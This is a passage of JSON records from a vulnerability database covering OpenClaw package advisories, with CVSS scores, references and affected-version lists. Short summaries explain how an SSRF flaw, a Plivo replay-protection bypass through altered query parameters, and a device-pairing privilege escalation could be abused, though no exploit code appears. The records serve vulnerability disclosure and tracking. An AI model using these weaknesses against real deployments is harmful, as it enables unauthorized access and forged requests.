"scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44116", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44116" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation" }, { "reference_url": "https://github.com/advisories/GHSA-2hh7-c75g-qj2r", "reference_id": "GHSA-2hh7-c75g-qj2r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2hh7-c75g-qj2r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-44116", "GHSA-2hh7-c75g-qj2r" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jshg-1pb2-wbak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90282?format=api", "vulnerability_id": "VCID-jtxm-z4vv-cqg7", "summary": "Duplicate Advisory: OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-cg6c-q2hx-69h7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification" }, { "reference_url": "https://github.com/advisories/GHSA-j56c-wpqm-h24x", "reference_id": "GHSA-j56c-wpqm-h24x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j56c-wpqm-h24x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api", "purl": "pkg:npm/openclaw@2026.3.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23" } ], "aliases": [ "GHSA-j56c-wpqm-h24x" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jtxm-z4vv-cqg7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91709?format=api", "vulnerability_id": "VCID-k3up-1vdf-2uh9", "summary": "Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path that fails to forward caller scopes into the core approval check. A caller with pairing privileges but without admin privileges can approve pending device requests asking for broader scopes including admin access by exploiting the missing scope validation in extensions/device-pair/index.ts and src/infra/device-pairing.ts.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval" }, { "reference_url": "https://github.com/advisories/GHSA-f275-5h5c-5wg5", "reference_id": "GHSA-f275-5h5c-5wg5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f275-5h5c-5wg5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { 